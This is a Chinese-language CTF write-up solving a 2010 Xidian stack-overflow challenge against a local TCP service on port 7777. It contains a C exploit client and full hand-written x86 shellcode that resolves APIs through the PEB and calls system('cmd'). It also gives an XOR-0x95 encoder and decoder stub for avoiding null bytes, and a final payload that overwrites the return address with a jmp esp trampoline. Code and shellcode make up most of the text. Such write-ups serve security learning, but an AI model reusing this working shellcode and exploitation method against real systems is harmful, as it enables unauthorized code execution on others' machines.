2010西电攻防exploit第6题

这是2010年溢出第六题，其实挺简单的，就是在shellcode上走了弯路。

 

执行程序后出现

也没法输入数据，那就打开OD看喽。

一看是一个TCP服务端，IP地址是“127.0.0.1”，port端口是0x1e61,即7777，那就构造了一个tcp客户端，发送数据

 

#include <winsock2.h>

#include <stdio.h>

#pragmacomment(lib,"wsock32.lib")

#define BUF_SIZE 10001

WSADATA        wsd;

SOCKET         sHost;           //服务器套接字

SOCKADDR_IN    servAddr;        //服务器地址

int            retVal;          //返回值

int main(int argc, char* argv[])

{

       charbuf[BUF_SIZE]="111111111111111111111111111111....";

                FILE *p=NULL;

   char fname[]="shell2";

       //①初始化套接字动态库

       if(WSAStartup(MAKEWORD(2,2),&wsd) != 0)

       {

              printf("WSAStartupfailed!\n");

 return -1; 

 }

 

 //②创建套接字

 sHost =socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

 if(INVALID_SOCKET == sHost)

 {

 printf("socket failed!\n");

 WSACleanup();

 return -1;

 }

 

 //③连接服务器

 servAddr.sin_family = AF_INET;

 servAddr.sin_addr.s_addr =inet_addr("127.0.0.1");

 servAddr.sin_port = htons(7777); //第二题为6000，第6题为7777

 intnServAddLen = sizeof(servAddr);

 retVal = connect(sHost,(LPSOCKADDR)&servAddr, nServAddLen );

 

 if(SOCKET_ERROR == retVal)

 {

 printf("connect failed!\n");

 closesocket(sHost);

 WSACleanup();

 return -1;

 }

 //④发送数据

 while (1)

 {

        retVal = send(sHost, buf, strlen(buf), 0); //发送数据

        if(SOCKET_ERROR == retVal)

        {

               printf("send failed!\n");

               closesocket(sHost);

               WSACleanup();

               return -1;

 

        }

        ZeroMemory(buf,BUF_SIZE);

        retVal = recv(sHost, buf, BUF_SIZE, 0);

        if(SOCKET_ERROR == retVal)

        {

               printf("recv failed!\n");

               closesocket(sHost);

               WSACleanup();

               return -1;

        }

        printf("%s\n",buf);

        ZeroMemory(buf,BUF_SIZE);

    scanf("%s",buf);

}

 //⑤退出

 closesocket(sHost); //关闭socket

 WSACleanup();

 

 return 0;

}

接收数据后往后走，进入这个函数里，发现溢出触发点在这里边。

该函数首先将接收到的数据存入0x18fab8开始的内存里，然后是

一串长长的push call的指令，F8直接跳过，没什么用。

到这个retn这个地方，它返回的是栈地址18fb80里的地址，这个距离我们的数据地址18fab8只有0xc8，即200个字节，这样构造数据，在201到204个字节写\x00\xB8\xFA\x18，获得程序执行权限后程序就跳转到了输入数据的开始处，即shellcode的入口处，就可以执行我们想要的功能了。我就是卡在了这个构造shellcode上了，题上要求是弹出一个cmd,用Metasploit构造shellcode是193个字节，可是里边含有\x00坏字节，还要编码，不行，自己写用动态加载API地址加载shellExecu()函数用了207个自己，不行，用system()函数用了180个字节，这是最小的了，剩下20个字节我好不容易的构造了个解码的程序。

原程序shellcode,180个字节

 

"\xEB\x67\x55\x8B\xEC\x64\xA1\x30"

"\x00\x00\x00\x8B\x40\x0C\x8B\x40\x14\x8B\x00\x8B\x70\x28\x80\x7E"

"\x0C\x33\x75\xF5\x8B\x40\x10\x8B\xF8\x03\x7F\x3C\x8B\x7F\x78\x03"

"\xF8\x8B\xDF\x8B\x7B\x20\x03\xF8\x33\xC9\x8B\x34\x8F\x03\xF0\x41"

"\x8B\x54\x24\x08\x39\x16\x75\xF2\x8B\x54\x24\x0C\x39\x56\x04\x75"

"\xE9\x8B\x7B\x24\x03\xF8\x8B\x0C\x4F\x81\xE1\xFF\xFF\x00\x00\x8B"

"\x7B\x1C\x03\xF8\x49\xC1\xE1\x02\x8B\x3C\x0F\x03\xC7\x5D\xC2\x08"

"\x00\x68\x72\x6F\x63\x41\x68\x47\x65\x74\x50\xE8\x8A\xFF\xFF\xFF"

"\x50\x68\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\xE8\x7A\xFF\xFF\xFF"

"\x50\x68\x72\x74\x00\x00\x68\x6D\x73\x76\x63\x54\xFF\xD0\x83\xC4"

"\x08\x68\x65\x6D\x00\x00\x68\x73\x79\x73\x74\x54\x50\xFF\x54\x24"

"\x14\x83\xC4\x08\x68\x63\x6D\x64\x00\x54\xFF\xD0”

装载运行如图正常

 

写个异或0x95的编码程序编码后是

"\x7e\xf2\xc0\x1e\x79\xf1\x34\xa5\x95\x95\x95\x1e\xd5\x99\x1e\xd5\x81"

"\x1e\x95\x1e\xe5\xbd\x15\xeb\x99\xa6\xe0\x60\x1e\xd5\x85\x1e\x6d"

"\x96\xea\xa9\x1e\xea\xed\x96\x6d\x1e\x4a\x1e\xee\xb5\x96\x6d\xa6"

"\x5c\x1e\xa1\x1a\x96\x65\xd4\x1e\xc1\xb1\x9d\xac\x83\xe0\x67\x1e"

"\xc1\xb1\x99\xac\xc3\x91\xe0\x7c\x1e\xee\xb1\x96\x6d\x1e\x99\xda"

"\x14\x74\x6a\x6a\x95\x95\x1e\xee\x89\x96\x6d\xdc\x54\x74\x97\x1e"

"\xa9\x9a\x96\x52\xc8\x57\x9d\x95\xfd\xe7\xfa\xf6\xd4\xfd\xd2\xf0"

"\xe1\xc5\x7d\x1f\x6a\x6a\x6a\xc5\xfd\xd9\xfc\xf7\xe7\xfd\xd9\xfa"

"\xf4\xf1\x7d\xef\x6a\x6a\x6a\xc5\xfd\xe7\xe1\x95\x95\xfd\xf8\xe6"

"\xe3\xf6\xc1\x6a\x45\x16\x51\x9d\xfd\xf0\xf8\x95\x95\xfd\xe6\xec"

"\xe6\xe1\xc1\xc5\x6a\xc1\xb1\x81\x16\x51\x9d\xfd\xf6\xf8\xf1\x95"

"\xc1\x6a\x45"

 

解码程序是

\x05\x64\x60\xD8\xFF  add eax,0Xffd86064              根据我机器上的具体情况此时eax等于需解码程序的开始地址

\x8A\x1C\x10        mov bl,byte ptr ds:[eax+edx]        edx为0，用来计数

\x80\xF3\x95          xor bl, 0x95                      异或0x95

\x88\x1C\x10          mov byte ptr ds:[eax+edx],bl

\x42                 inc edx

\x80\xFA\xB4         cmp dl,0Xb4                      解码180个字节后停止解码

\x75\xF1             jnz 0018fabd

 

全部解码后

全部解码成功，可是运行时出错，分析一下原来此时esp的内容是18FBXX,有压栈操作时就将这段代码覆盖，导致出错.这样不行，换了种方法，用JMP ESP做跳板，将在程序中找一个jmp esp指令

将这条指令的地址放在shellcode201~204字节的位置，用来覆盖返回地址，只是这个地址不是固定的，kernel32.dll的基地址在每次重启系统后都不一样，有它的局限性。前200字节全用“111”填充，205字节开始构造真正的shellcode

重新构造shellcode如下：

charbuf[BUF_SIZE]="11111111111111111111111111111111111111111111111111"  //填充字节

"11111111111111111111111111111111111111111111111111"

"11111111111111111111111111111111111111111111111111"

"11111111111111111111111111111111111111111111111111"

"\x05\x04\xd7\x74"                                  //关键地址覆盖，指向jmp esp

"\x05\x30\x61\xD8\xFF\x8A\x1C\x10\x80\xF3\x95\x88\x1C\x10\x42\x80\xFA\xD0\x75\xF1"//解码器

"\x7e\xf2\xc0\x1e\x79\xf1\x34\xa5\x95\x95\x95\x1e\xd5\x99\x1e\xd5\x81"   //打开cmd

"\x1e\x95\x1e\xe5\xbd\x15\xeb\x99\xa6\xe0\x60\x1e\xd5\x85\x1e\x6d"

"\x96\xea\xa9\x1e\xea\xed\x96\x6d\x1e\x4a\x1e\xee\xb5\x96\x6d\xa6"

"\x5c\x1e\xa1\x1a\x96\x65\xd4\x1e\xc1\xb1\x9d\xac\x83\xe0\x67\x1e"

"\xc1\xb1\x99\xac\xc3\x91\xe0\x7c\x1e\xee\xb1\x96\x6d\x1e\x99\xda"

"\x14\x74\x6a\x6a\x95\x95\x1e\xee\x89\x96\x6d\xdc\x54\x74\x97\x1e"

"\xa9\x9a\x96\x52\xc8\x57\x9d\x95\xfd\xe7\xfa\xf6\xd4\xfd\xd2\xf0"

"\xe1\xc5\x7d\x1f\x6a\x6a\x6a\xc5\xfd\xd9\xfc\xf7\xe7\xfd\xd9\xfa"

"\xf4\xf1\x7d\xef\x6a\x6a\x6a\xc5\xfd\xf9\xa6\xa7\x95\xfd\xc6\xfd"

"\xf0\xf9\xc1\x6a\x45\x16\x51\x9d\xff\xd4\xfd\xf6\xe0\xe1\xf0\xfd"

"\xf9\xd0\xed\xf0\xfd\xc6\xfd\xf0\xf9\xc1\xc5\x6a\xc1\xb1\x89\x16"

"\x51\x85\xa6\x47\xfd\xf6\xf8\xf1\x95\x1e\x49\xc7\xfd\xfa\xe5\xf0"

"\xfb\x1e\x59\xff\x94\xc7\xc7\xc6\xc4\xc7\x6a\x45\x16\x51\x81";

再次运行程序，然后运行tcp客户端的程序，如图：

最下边的是exploit6程序，中间的是tcp客户端的程序，最上边的是打开的cmd,因为我没在shellcode中写ExitProcess函数，所以exploit6程序无法善终，但是打开cmd的要求已经实现了。